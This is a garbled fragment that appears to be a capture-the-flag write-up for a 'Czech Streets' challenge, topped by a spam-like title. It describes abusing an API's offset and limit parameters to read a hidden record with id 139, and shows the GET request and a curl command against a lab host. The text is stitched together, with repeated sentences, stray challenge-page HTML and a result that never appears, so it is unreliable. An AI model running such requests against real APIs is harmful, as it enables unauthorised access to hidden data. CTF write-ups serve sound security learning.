Je suis proCzechstreets 139 =link= Review
In short: that lets us read arbitrary street objects, including the hidden one with id = 139 . 4️⃣ Exploiting the Bug 4.1 Crafting the request We want the object with id = 139 . The API returns records in order of id . By setting offset=138 and a huge limit we can retrieve the 139th entry:
<!DOCTYPE html> <html> <head><title>Czech Streets – Find the hidden street</title></head> <body> <h1>Welcome to the Czech Streets challenge!</h1> <p>Enter a street name to see its details.</p> czechstreets 139
GET /api/streets?offset=138&limit=1000000 Running the request: In short: that lets us read arbitrary street
curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" | jq . Result: Welcome to the Czech Streets challenge!<